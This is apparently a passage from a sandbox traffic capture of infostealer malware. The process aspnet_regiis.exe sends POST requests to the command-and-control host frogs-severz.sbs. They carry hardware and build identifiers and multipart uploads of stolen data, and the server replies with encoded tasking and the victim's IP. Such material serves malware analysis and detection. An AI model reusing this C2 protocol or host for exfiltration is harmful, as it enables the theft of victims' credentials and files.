                                                                                                                                                          Set-Cookie: PHPSESSID=jol29481gt9j646crcus34r2ud; expires=Wed, 19-Mar-2025 05:34:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vEIbmNGEwGW3UD0gedtGrOxeR9BsNLSrrySwNF8NIufnqRN%2Bp1WFrMum3uCekpXFAHVyz2cXTOhC2E%2FmlPCwhnjpOSlmGX6%2FwnT3VMRgkPatwUhwsQ6HlttLoX0ki09r8Ooq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e70ecb46de0c328-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1710603&cwnd=177&unsent_bytes=0&cid=988f9e69b54120e8&ts=715&x=0"
                                                                                                                                                          2024-11-23 11:47:28 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                          2024-11-23 11:47:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          6192.168.2.449747104.21.88.2504438084C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-23 11:47:29 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 86
                                                                                                                                                          Host: frogs-severz.sbs
                                                                                                                                                          2024-11-23 11:47:29 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--b8bb860e1ee2&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                                                                                                          2024-11-23 11:47:30 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sat, 23 Nov 2024 11:47:30 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=1iibvt7s9ui4n5u9sj8nes6dl3; expires=Wed, 19-Mar-2025 05:34:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PEWm3POzF%2BDHD4G%2BePmDaL64yMOc5LwpZBzB7OgfuNOcCFMv%2FhVOcc5%2Fq%2BtChtAfYiznlZtUsqPqelGSLIQZ9XpJ5kJU3gPW%2F5OfCgLW6IunMqlk5xzo4m5EjwxkgMUDvLhY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e70ecc17e757cff-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1980&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=986&delivery_rate=1433480&cwnd=207&unsent_bytes=0&cid=d63e6d6b2ac2818b&ts=739&x=0"
                                                                                                                                                          2024-11-23 11:47:30 UTC356INData Raw: 63 63 62 0d 0a 4b 57 68 30 6e 63 6d 38 67 62 4c 4f 6a 6b 64 4c 52 2b 31 41 72 58 54 56 63 65 45 65 30 6c 32 58 2f 6c 76 72 4d 72 70 6d 38 69 56 53 53 67 4b 2f 38 34 69 74 6b 4c 33 72 5a 58 45 68 6a 43 7a 65 45 66 6c 54 67 48 72 77 5a 2f 47 66 4e 35 68 58 6c 6b 53 45 53 41 74 53 45 76 79 6c 7a 2b 53 65 37 4f 73 2f 61 58 32 32 4f 34 38 52 75 31 50 62 50 4c 63 33 39 5a 38 33 69 56 50 52 43 59 4a 4a 53 67 41 59 2b 71 48 5a 34 74 61 76 34 69 6f 75 49 6f 67 68 78 78 71 38 48 49 6c 7a 38 48 47 31 6d 79 48 4a 43 4a 67 72 6c 31 46 49 4a 52 58 75 6f 70 37 38 6e 72 57 73 49 69 56 6c 31 32 4c 4d 45 62 63 64 68 33 71 35 4e 66 2b 57 50 34 68 57 30 42 61 62 51 30 45 41 46 76 6d 67 30 2b 76 43 6f 75 67 74 4a 53 53 43 49 59 39 59 39 78 53 62 50 4f 68 2f 70 71 34 36 6d 45
                                                                                                                                                          Data Ascii: ccbKWh0ncm8gbLOjkdLR+1ArXTVceEe0l2X/lvrMrpm8iVSSgK/84itkL3rZXEhjCzeEflTgHrwZ/GfN5hXlkSESAtSEvylz+Se7Os/aX22O48Ru1PbPLc39Z83iVPRCYJJSgAY+qHZ4tav4iouIoghxxq8HIlz8HG1myHJCJgrl1FIJRXuop78nrWsIiVl12LMEbcdh3q5Nf+WP4hW0BabQ0EAFvmg0+vCougtJSSCIY9Y9xSbPOh/pq46mE
                                                                                                                                                          2024-11-23 11:47:30 UTC1369INData Raw: 51 76 75 51 75 49 69 43 64 4b 63 59 62 75 68 4f 4f 64 72 38 38 39 5a 73 7a 67 31 2f 53 41 4a 31 4b 54 51 6f 57 76 2b 57 65 35 4d 6a 73 74 47 55 4b 49 4a 38 6c 77 77 44 31 4b 63 4e 6a 2f 69 61 31 6d 7a 58 4a 43 4a 67 4d 6c 55 52 49 41 52 6e 38 6f 39 58 78 30 4c 37 71 4b 43 77 33 69 53 66 42 48 4c 51 42 69 58 4b 32 50 50 79 58 4d 49 78 58 33 45 54 65 42 30 77 53 56 71 66 72 2f 2b 37 62 6f 4f 59 79 4b 57 57 51 62 4e 5a 57 73 42 2f 44 4a 50 41 37 39 4a 67 34 6a 56 37 57 41 4a 78 42 52 51 63 5a 2b 61 48 65 35 4e 71 6b 35 43 51 6b 4c 6f 41 69 79 68 75 7a 46 59 39 39 74 58 2b 37 33 44 36 52 45 49 42 45 76 6b 42 49 47 46 54 4b 71 4e 44 74 31 37 71 73 4f 6d 63 38 7a 79 58 44 56 75 39 54 6a 58 6d 2f 4c 66 53 4f 50 49 64 43 31 41 47 57 53 6b 67 45 46 76 71 73 30 2b
                                                                                                                                                          Data Ascii: QvuQuIiCdKcYbuhOOdr889Zszg1/SAJ1KTQoWv+We5MjstGUKIJ8lwwD1KcNj/ia1mzXJCJgMlURIARn8o9Xx0L7qKCw3iSfBHLQBiXK2PPyXMIxX3ETeB0wSVqfr/+7boOYyKWWQbNZWsB/DJPA79Jg4jV7WAJxBRQcZ+aHe5Nqk5CQkLoAiyhuzFY99tX+73D6REIBEvkBIGFTKqNDt17qsOmc8zyXDVu9TjXm/LfSOPIdC1AGWSkgEFvqs0+
                                                                                                                                                          2024-11-23 11:47:30 UTC1369INData Raw: 4f 6d 63 38 7a 79 58 44 56 75 39 54 6a 33 57 77 4e 50 2b 59 4f 59 35 64 33 51 65 58 52 45 59 4e 48 50 47 73 32 75 2f 5a 6f 65 6f 6c 4c 69 47 4b 4d 4d 6f 66 75 78 2f 44 4d 76 41 34 37 64 78 68 79 58 2f 66 45 70 4e 6f 53 42 73 66 76 37 53 51 2b 70 43 72 34 47 56 78 5a 59 67 6e 78 78 32 78 47 34 4e 75 74 54 48 2b 6e 54 4f 50 55 64 55 49 6c 6b 64 4b 43 68 44 7a 71 39 6e 6b 77 72 37 70 49 7a 73 76 7a 32 79 50 45 61 39 54 32 7a 79 47 4c 2b 4b 4e 4c 38 74 6c 32 77 71 65 51 46 31 4b 43 62 47 79 6e 75 54 63 37 4c 52 6c 49 69 57 44 4a 63 63 51 73 78 75 4d 63 37 6b 74 39 4a 41 33 6d 31 66 59 44 5a 35 49 52 77 4d 62 2b 4b 62 56 36 64 32 6f 36 79 52 70 61 38 38 6c 31 31 62 76 55 37 56 73 76 54 50 62 6c 7a 57 41 45 4d 64 4b 69 51 64 4d 42 6c 61 6e 36 39 72 76 32 4b 62
                                                                                                                                                          Data Ascii: Omc8zyXDVu9Tj3WwNP+YOY5d3QeXREYNHPGs2u/ZoeolLiGKMMofux/DMvA47dxhyX/fEpNoSBsfv7SQ+pCr4GVxZYgnxx2xG4NutTH+nTOPUdUIlkdKChDzq9nkwr7pIzsvz2yPEa9T2zyGL+KNL8tl2wqeQF1KCbGynuTc7LRlIiWDJccQsxuMc7kt9JA3m1fYDZ5IRwMb+KbV6d2o6yRpa88l11bvU7VsvTPblzWAEMdKiQdMBlan69rv2Kb
                                                                                                                                                          2024-11-23 11:47:30 UTC188INData Raw: 49 73 6c 79 78 43 34 55 38 30 38 74 79 65 31 78 48 6d 6d 64 2b 31 47 73 58 30 4c 46 56 6a 6d 36 39 6e 76 6b 50 53 73 4b 53 6f 70 68 79 33 4a 48 37 73 5a 69 6e 65 38 4e 50 47 51 4d 49 78 57 32 51 47 56 52 6b 38 47 48 50 6d 6f 33 65 7a 66 6f 2b 52 6c 5a 32 57 49 4f 6f 39 4f 39 7a 61 55 64 37 34 35 74 59 4e 33 6b 42 44 66 43 4e 41 66 43 77 59 66 2b 61 33 62 37 39 47 71 35 43 41 68 49 59 34 6b 79 52 57 34 46 34 5a 39 76 7a 76 35 6b 6a 4f 49 55 64 51 50 6e 30 78 4f 53 6c 69 2f 72 4d 61 6a 69 4f 7a 64 4a 6a 38 79 6e 79 36 50 43 66 6b 4b 77 33 75 38 66 36 33 0d 0a
                                                                                                                                                          Data Ascii: IslyxC4U808tye1xHmmd+1GsX0LFVjm69nvkPSsKSophy3JH7sZine8NPGQMIxW2QGVRk8GHPmo3ezfo+RlZ2WIOo9O9zaUd745tYN3kBDfCNAfCwYf+a3b79Gq5CAhIY4kyRW4F4Z9vzv5kjOIUdQPn0xOSli/rMajiOzdJj8yny6PCfkKw3u8f63
                                                                                                                                                          2024-11-23 11:47:30 UTC1369INData Raw: 33 32 33 39 0d 0a 63 4f 4a 74 61 30 67 71 56 53 45 34 4a 47 66 69 6d 32 4f 2f 61 70 65 51 6a 4a 69 79 64 49 63 4d 59 73 42 32 50 63 72 30 31 39 70 46 35 78 78 44 66 48 4e 41 66 43 79 59 52 38 6f 58 56 37 39 66 73 38 32 73 77 5a 59 67 75 6a 30 37 33 48 34 6c 77 75 54 2f 38 6d 54 47 43 57 64 30 46 6d 30 4a 49 44 42 76 77 6f 73 7a 70 30 36 4c 76 4b 53 55 6a 6a 69 48 64 48 72 35 54 7a 54 79 33 4a 37 58 45 65 61 68 65 31 52 43 58 56 77 73 56 57 4f 62 72 32 65 2b 51 39 4b 77 6d 4b 43 71 4d 49 38 49 51 76 68 75 44 65 72 55 77 2b 4a 49 2b 6a 6c 44 56 43 70 39 42 51 77 63 61 39 4b 58 58 35 64 43 74 35 6d 56 6e 5a 59 67 36 6a 30 37 33 49 34 42 38 73 43 53 31 67 33 65 51 45 4e 38 49 30 42 38 4c 47 42 7a 32 71 39 33 73 31 36 6a 6e 4b 53 77 67 67 43 48 47 45 37 34 64
                                                                                                                                                          Data Ascii: 3239cOJta0gqVSE4JGfim2O/apeQjJiydIcMYsB2Pcr019pF5xxDfHNAfCyYR8oXV79fs82swZYguj073H4lwuT/8mTGCWd0Fm0JIDBvwoszp06LvKSUjjiHdHr5TzTy3J7XEeahe1RCXVwsVWObr2e+Q9KwmKCqMI8IQvhuDerUw+JI+jlDVCp9BQwca9KXX5dCt5mVnZYg6j073I4B8sCS1g3eQEN8I0B8LGBz2q93s16jnKSwggCHGE74d
                                                                                                                                                          2024-11-23 11:47:30 UTC1369INData Raw: 4f 31 78 48 6d 49 58 4e 63 48 6e 30 52 49 43 78 7a 74 75 64 4c 71 32 4b 6e 67 4c 69 63 6a 6e 53 54 41 48 37 51 51 69 6e 75 34 4d 2f 2b 66 50 73 6b 65 6d 41 4f 49 42 78 4e 4b 4e 65 69 37 30 36 50 50 34 76 56 6c 4c 69 6e 50 65 6f 38 65 75 68 75 4a 65 4c 63 79 38 70 6f 77 6d 31 6e 64 43 70 42 44 51 41 55 51 2b 36 6a 65 38 64 61 6f 35 43 59 6b 4b 49 45 68 79 31 62 35 55 34 52 6b 38 47 65 31 72 6a 53 48 53 39 63 44 67 55 30 4c 46 56 6a 6d 36 39 6e 76 6b 50 53 73 49 53 63 33 68 43 50 45 48 62 6b 55 6a 48 6d 36 50 2f 71 59 4f 6f 64 62 32 51 65 59 53 6b 59 45 48 50 61 69 32 65 2f 55 71 36 78 72 61 53 4b 58 59 70 64 57 6e 44 4b 75 55 4c 63 6c 74 59 4e 33 6b 42 44 66 43 4e 41 66 43 77 59 66 38 36 48 56 35 4e 71 69 35 53 73 69 4e 35 30 68 79 78 57 2b 45 49 52 31 76
                                                                                                                                                          Data Ascii: O1xHmIXNcHn0RICxztudLq2KngLicjnSTAH7QQinu4M/+fPskemAOIBxNKNei706PP4vVlLinPeo8euhuJeLcy8powm1ndCpBDQAUQ+6je8dao5CYkKIEhy1b5U4Rk8Ge1rjSHS9cDgU0LFVjm69nvkPSsISc3hCPEHbkUjHm6P/qYOodb2QeYSkYEHPai2e/Uq6xraSKXYpdWnDKuULcltYN3kBDfCNAfCwYf86HV5Nqi5SsiN50hyxW+EIR1v
                                                                                                                                                          2024-11-23 11:47:30 UTC1369INData Raw: 35 78 78 44 66 48 4e 41 66 43 79 63 61 2b 49 4c 5a 2b 4a 43 7a 6f 6a 78 70 49 6f 4e 69 6c 31 61 32 47 49 6c 7a 76 54 7a 7a 6e 7a 4b 4d 57 74 6b 44 6d 45 70 5a 43 52 6e 77 72 39 37 73 31 71 72 74 4b 69 38 69 68 69 50 48 45 66 64 64 77 33 75 6f 66 36 33 63 46 34 35 54 33 45 53 50 43 56 4a 4b 45 66 50 72 68 71 50 51 70 75 59 76 4a 79 57 49 4d 4d 6b 66 74 78 43 52 66 37 59 33 38 35 41 31 68 46 6a 52 42 4a 56 4d 52 67 45 62 2b 61 76 56 34 70 44 69 72 43 49 78 5a 64 64 69 2f 68 75 35 46 34 31 2f 6f 44 69 31 67 33 65 51 45 4e 38 49 30 42 38 4c 42 52 2f 74 72 4e 76 72 32 61 7a 69 4c 43 41 69 69 79 48 4f 45 72 73 63 69 6e 2b 34 50 76 32 54 4f 6f 6c 62 30 41 36 52 53 55 35 4b 57 4c 2b 73 78 71 4f 49 37 4d 4d 6d 4c 43 36 4f 59 4f 67 51 73 42 2f 44 59 2f 34 6d 74 5a
                                                                                                                                                          Data Ascii: 5xxDfHNAfCyca+ILZ+JCzojxpIoNil1a2GIlzvTzznzKMWtkDmEpZCRnwr97s1qrtKi8ihiPHEfddw3uof63cF45T3ESPCVJKEfPrhqPQpuYvJyWIMMkftxCRf7Y385A1hFjRBJVMRgEb+avV4pDirCIxZddi/hu5F41/oDi1g3eQEN8I0B8LBR/trNvr2aziLCAiiyHOErscin+4Pv2TOolb0A6RSU5KWL+sxqOI7MMmLC6OYOgQsB/DY/4mtZ
                                                                                                                                                          2024-11-23 11:47:30 UTC1369INData Raw: 6d 69 71 62 55 30 78 4b 57 4c 2b 74 6e 72 75 41 34 71 77 68 4f 47 58 58 63 70 31 4e 34 6b 44 55 4c 4f 49 67 75 34 56 35 6e 78 43 41 56 74 34 48 57 55 70 4f 76 2b 7a 64 38 63 4b 71 37 7a 4d 71 59 72 45 63 7a 41 43 36 48 49 68 39 6a 67 48 62 6b 54 69 4b 58 70 6f 31 68 6b 70 62 43 52 50 34 6c 65 44 74 31 37 6a 72 4b 79 38 6c 7a 32 79 50 47 66 64 4c 75 6a 7a 34 66 38 72 53 65 5a 45 51 67 45 53 6c 52 45 55 45 45 65 6d 36 6b 38 44 47 6f 65 4d 75 4b 47 58 42 59 73 6c 57 37 30 50 4e 50 4c 51 75 74 63 52 70 32 77 75 4e 56 38 63 58 47 52 56 59 35 75 76 49 6f 34 6a 2b 6f 6d 55 37 5a 64 64 69 69 42 69 36 45 6f 42 79 73 79 33 6e 6d 6a 71 66 55 35 38 36 72 6d 5a 47 41 52 72 79 70 4e 58 64 37 6f 33 68 4c 69 55 6f 67 43 6e 78 4b 4b 49 51 6a 58 4b 33 4b 65 54 63 64 38 6c
                                                                                                                                                          Data Ascii: miqbU0xKWL+tnruA4qwhOGXXcp1N4kDULOIgu4V5nxCAVt4HWUpOv+zd8cKq7zMqYrEczAC6HIh9jgHbkTiKXpo1hkpbCRP4leDt17jrKy8lz2yPGfdLujz4f8rSeZEQgESlREUEEem6k8DGoeMuKGXBYslW70PNPLQutcRp2wuNV8cXGRVY5uvIo4j+omU7ZddiiBi6EoBysy3nmjqfU586rmZGARrypNXd7o3hLiUogCnxKKIQjXK3KeTcd8l
                                                                                                                                                          2024-11-23 11:47:30 UTC1369INData Raw: 46 59 4c 55 6b 61 74 38 49 75 77 68 2f 79 2b 4f 6d 63 38 7a 7a 53 50 54 75 56 64 77 32 37 77 5a 37 58 62 4f 70 74 43 33 67 65 47 52 41 77 30 4b 4e 71 38 33 66 50 57 72 39 49 62 41 69 6d 4a 4a 64 55 52 73 54 57 6a 50 50 35 2f 2b 74 78 68 73 42 43 51 52 4b 38 4a 43 78 4a 57 70 2b 76 72 34 4e 36 69 36 7a 4d 34 61 4b 6f 31 7a 41 61 78 45 4d 4d 79 38 44 6d 31 78 47 6e 48 45 4e 77 56 30 42 38 62 57 45 32 71 2b 49 6d 7a 67 72 4f 69 50 47 6b 7a 7a 33 71 64 57 50 63 42 77 79 54 77 65 50 61 4f 4b 34 39 54 7a 67 66 58 65 58 55 73 46 65 36 68 2f 2b 37 41 71 39 49 62 50 43 61 42 4c 4d 67 41 70 6c 50 4e 50 4c 39 2f 72 61 56 35 77 52 7a 65 42 34 59 48 64 45 52 57 35 2b 75 47 6f 2b 57 76 34 69 73 75 4d 35 35 76 36 52 57 6d 47 61 4a 78 6f 44 69 31 30 6e 6d 50 45 49 42 58
                                                                                                                                                          Data Ascii: FYLUkat8Iuwh/y+Omc8zzSPTuVdw27wZ7XbOptC3geGRAw0KNq83fPWr9IbAimJJdURsTWjPP5/+txhsBCQRK8JCxJWp+vr4N6i6zM4aKo1zAaxEMMy8Dm1xGnHENwV0B8bWE2q+ImzgrOiPGkzz3qdWPcBwyTwePaOK49TzgfXeXUsFe6h/+7Aq9IbPCaBLMgAplPNPL9/raV5wRzeB4YHdERW5+uGo+Wv4isuM55v6RWmGaJxoDi10nmPEIBX


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          7192.168.2.449748104.21.88.2504438084C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-23 11:47:32 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: multipart/form-data; boundary=F7T7SFWO3V8ZTN3AJ
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 18164
                                                                                                                                                          Host: frogs-severz.sbs
                                                                                                                                                          2024-11-23 11:47:32 UTC15331OUTData Raw: 2d 2d 46 37 54 37 53 46 57 4f 33 56 38 5a 54 4e 33 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 43 34 41 38 30 38 39 45 36 45 45 39 34 31 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 46 37 54 37 53 46 57 4f 33 56 38 5a 54 4e 33 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 37 54 37 53 46 57 4f 33 56 38 5a 54 4e 33 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65
                                                                                                                                                          Data Ascii: --F7T7SFWO3V8ZTN3AJContent-Disposition: form-data; name="hwid"35C4A8089E6EE941FF1C6333321FCDD9--F7T7SFWO3V8ZTN3AJContent-Disposition: form-data; name="pid"2--F7T7SFWO3V8ZTN3AJContent-Disposition: form-data; name="lid"HpOoIh--b8bb860e
                                                                                                                                                          2024-11-23 11:47:32 UTC2833OUTData Raw: cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b
                                                                                                                                                          Data Ascii: xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{
                                                                                                                                                          2024-11-23 11:47:33 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sat, 23 Nov 2024 11:47:32 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=t31qds1gpumgfb32j5c0hpm5qd; expires=Wed, 19-Mar-2025 05:34:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=85E8%2F4RFZLNNZEmecvzb%2Bj%2FNY6QDuQTTj7rItbjWl0XYH7H%2BHEwU1ngu7NlsN4CiszAxZKR5%2FbuFGGiT4ybwmS8hYMy8GFlftxc5ClAPmS2BZR7D74533PJ%2F0R7ktDAg7CzE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e70eccf68e3438a-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1742&sent=15&recv=23&lost=0&retrans=0&sent_bytes=2839&recv_bytes=19125&delivery_rate=1682997&cwnd=205&unsent_bytes=0&cid=cbce66c11ea96df3&ts=860&x=0"
                                                                                                                                                          2024-11-23 11:47:33 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                          Data Ascii: eok 8.46.123.75
                                                                                                                                                          2024-11-23 11:47:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          8192.168.2.449749104.21.88.2504438084C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-23 11:47:34 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: multipart/form-data; boundary=E4SXMRUR15VL
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 8755
                                                                                                                                                          Host: frogs-severz.sbs
                                                                                                                                                          2024-11-23 11:47:34 UTC8755OUTData Raw: 2d 2d 45 34 53 58 4d 52 55 52 31 35 56 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 43 34 41 38 30 38 39 45 36 45 45 39 34 31 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 45 34 53 58 4d 52 55 52 31 35 56 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 34 53 58 4d 52 55 52 31 35 56 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 0d 0a 2d 2d 45 34 53 58 4d 52 55
                                                                                                                                                          Data Ascii: --E4SXMRUR15VLContent-Disposition: form-data; name="hwid"35C4A8089E6EE941FF1C6333321FCDD9--E4SXMRUR15VLContent-Disposition: form-data; name="pid"2--E4SXMRUR15VLContent-Disposition: form-data; name="lid"HpOoIh--b8bb860e1ee2--E4SXMRU
                                                                                                                                                          2024-11-23 11:47:35 UTC1010INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sat, 23 Nov 2024 11:47:35 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=5u1incmid8povq6jjivmdlahnc; expires=Wed, 19-Mar-2025 05:34:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ML7urnt8SKQuJFW3EQPGnJG3eDuRT5MmPlzKnNZ88ezcN%2B0AB9uht14Vce3E%2FYb1VavN2ZIuRj37OIASOkXnZCvPC87J93LKQyJZVpYr%2FDTohp9D20FtidYyAvDVjGl9gqWu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e70ecdd68b29e08-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1945&sent=10&recv=13&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9688&delivery_rate=1458541&cwnd=163&unsent_bytes=0&cid=dca50ca56ec63ad0&ts=774&x=0"
